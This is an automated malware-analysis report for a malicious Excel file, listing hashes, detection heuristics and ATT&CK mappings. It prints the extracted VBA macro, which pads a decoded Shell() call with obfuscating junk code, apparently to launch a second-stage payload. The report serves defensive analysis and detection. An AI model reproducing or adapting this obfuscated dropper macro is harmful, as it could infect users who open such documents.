Xls.Malware.Stratos-7506050-0 Office (OLE) malware analysis — malicious · 0883082fdeae9373

MALICIOUS

Office (OLE)

162.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2019-12-10

MD5: f0b44be9d0f4c4bd3539772c5d255a62 SHA-1: af559f3e603d6bcb54e4d00c4580d45330644bc6 SHA-256: 0883082fdeae93734c4838cb0f740a7121d8d6fdc28b4a21dc088feac46ec7a4

140 Risk Score

Malware Insights

Xls.Malware.Stratos-7506050-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. The script attempts to construct a path by concatenating strings, likely to download and execute a secondary payload. The ClamAV detection name 'Xls.Malware.Stratos-7506050-0' further supports the malicious nature of this Excel file.

Heuristics 3

ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 57552 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	57552 bytes
SHA-256: `2bec83d846e0c743226c896070dc6b9e33f20c65f04ad5021698429f3d8ff22c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub ivs() ri = SdlyldDd5("u{p\|i(p\|\|xBddr6uxd", "8") Shell (ri + SdlyldDd5("ehvm\whm", "4")) End Sub Public Function OexQkfTzIJHM() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" End Function Public Function BFTeyMzmMjiKrJvzZzKE() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" End Function Private Sub YdAHOtFEUZ() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" Dim AkRUpRVkgPdCCdmyb As Integer AkRUpRVkgPdCCdmyb = "4722" End Sub Private Sub PpPbUnQtdntpBSh() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" Dim AkRUpRVkgPdCCdmyb As Integer AkRUpRVkgPdCCdmyb = "4722" If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End End Sub Private Sub mxgfSSuCOrKqNgsgeYqn() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" Dim AkRUpRVkgPdCCdmyb As Integer AkRUpRVkgPdCCdmyb = "4722" If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End End Sub Private Sub SDynHypDNwvjU() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" Dim AkRUpRVkgPdCCdmyb As Integer AkRUpRVkgPdCCdmyb = "4722" If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End GoTo bsfjIwuoGDawUb bsfjIwuoGDawUb: End Sub Public Sub wzNjluEzdsKf() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" Dim AkRUpRVkgPdCCdmyb As Integer AkRUpRVkgPdCCdmyb = "4722" If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End GoTo bsfjIwuoGDawUb bsfjIwuoGDawUb: GoTo QQVbLELqDCSVZQpExh QQVbLELqDCSVZQpExh: End Sub Private Function RmOThrMaNzbxwYFQIM() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" Dim AkRUpRVkgPdCCdmyb As Integer AkRUpRVkgPdCCdmyb = "4722" If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End GoTo bsfjIwuoGDawUb bsfjIwuoGDawUb: GoTo QQVbLELqDCSVZQpExh QQVbLELqDCSVZQpExh: Dim kiEayrnyPeAnxUPtubv As Integer kiEayrnyPeAnxUPtubv = 10 Do While kiEayrnyPeAnxUPtubv < 30 DoEvents: kiEayrnyPeAnxUPtubv = kiEayrnyPeAnxUPtubv + 1 Loop End Function Private Sub nomrOUcGTS() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" Dim AkRUpRVkgPdCCdmyb As Integer AkRUpRVkgPdCCdmyb = "4722" If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End GoTo bsfjIwuoGDawUb bsfjIwuoGDawUb: GoTo QQVbLELqDCSVZQpExh QQVbLELqDCSVZQpExh: Dim kiEayrnyPeAnxUPtubv As Integer kiEayrnyPeAnxUPtubv = 10 Do While kiEayrnyPeAnxUPtubv < 30 DoEvents: kiEayrnyPeAnxUPtubv = kiEayrnyPeAnxUPtubv + 1 Loop Dim GUNygiCfkxu As String GUNygiCfkxu = "9674" End Sub Public Sub PrzMoInLdDepjBkGqB() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" Dim AkRUpRVkgPdCCdmyb As Integer AkRUpRVkgPdCCdmyb = "4722" If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End GoTo bsfjIwuoGDawUb bsfjIwuoGDawUb: GoTo QQVbLELqDCSVZQpExh QQVbLELqDCSVZQpExh: Dim kiEayrnyPeAnxUPtubv As Integer kiEayrnyPeAnxUPtubv = 10 Do While kiEayrnyPeAnxUPtubv < 30 DoEvents: kiEayrnyPeAnxUPtubv = kiEayrnyPeAnxUPtubv + 1 Loop Dim GUNygiCfkxu As String GUNygiCfkxu = "9674" Dim vCENlgJLsyR As Integer For vCENlgJLsyR = 3 To 5 DoEvents Next vCENlgJLsyR End Sub Public Sub qotflsJkjzpsk() Dim poEIKCcrjT As Long poEIKCcrjT = "8265" Dim ldZlBQmajGBfhNinvl As Currency ldZlBQmajGBfhNinvl = "3079" Dim AkRUpRVkgPdCCdmyb As Integer AkRUpRVkgPdCCdmyb = "4722" If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End If "GRjkFGPoUy ... (truncated)

SHA-256: 2bec83d846e0c743226c896070dc6b9e33f20c65f04ad5021698429f3d8ff22c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub ivs()

ri = SdlyldDd5("u{p|i(p||xBddr6uxd", "8")

Shell (ri + SdlyldDd5("ehvm\whm", "4"))

End Sub
Public Function OexQkfTzIJHM()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"

End Function
Public Function BFTeyMzmMjiKrJvzZzKE()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"

End Function
Private Sub YdAHOtFEUZ()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"

End Sub
Private Sub PpPbUnQtdntpBSh()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End

End Sub
Private Sub mxgfSSuCOrKqNgsgeYqn()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End

End Sub
Private Sub SDynHypDNwvjU()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:

End Sub
Public Sub wzNjluEzdsKf()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:
GoTo QQVbLELqDCSVZQpExh
QQVbLELqDCSVZQpExh:

End Sub
Private Function RmOThrMaNzbxwYFQIM()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:
GoTo QQVbLELqDCSVZQpExh
QQVbLELqDCSVZQpExh:
Dim kiEayrnyPeAnxUPtubv As Integer
kiEayrnyPeAnxUPtubv = 10
Do While kiEayrnyPeAnxUPtubv < 30
   DoEvents: kiEayrnyPeAnxUPtubv = kiEayrnyPeAnxUPtubv + 1
Loop

End Function
Private Sub nomrOUcGTS()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:
GoTo QQVbLELqDCSVZQpExh
QQVbLELqDCSVZQpExh:
Dim kiEayrnyPeAnxUPtubv As Integer
kiEayrnyPeAnxUPtubv = 10
Do While kiEayrnyPeAnxUPtubv < 30
   DoEvents: kiEayrnyPeAnxUPtubv = kiEayrnyPeAnxUPtubv + 1
Loop
Dim GUNygiCfkxu As String
GUNygiCfkxu = "9674"

End Sub
Public Sub PrzMoInLdDepjBkGqB()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUyNuATcRx" = "trwhahLnYosumL" Then End
GoTo bsfjIwuoGDawUb
bsfjIwuoGDawUb:
GoTo QQVbLELqDCSVZQpExh
QQVbLELqDCSVZQpExh:
Dim kiEayrnyPeAnxUPtubv As Integer
kiEayrnyPeAnxUPtubv = 10
Do While kiEayrnyPeAnxUPtubv < 30
   DoEvents: kiEayrnyPeAnxUPtubv = kiEayrnyPeAnxUPtubv + 1
Loop
Dim GUNygiCfkxu As String
GUNygiCfkxu = "9674"
Dim vCENlgJLsyR As Integer
For vCENlgJLsyR = 3 To 5
   DoEvents
Next vCENlgJLsyR

End Sub
Public Sub qotflsJkjzpsk()
Dim poEIKCcrjT As Long
poEIKCcrjT = "8265"
Dim ldZlBQmajGBfhNinvl As Currency
ldZlBQmajGBfhNinvl = "3079"
Dim AkRUpRVkgPdCCdmyb As Integer
AkRUpRVkgPdCCdmyb = "4722"
If "RvxekDLBhcdbgQYfvVVl" = "eVvYCAiQri" Then End
If "GRjkFGPoUy
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.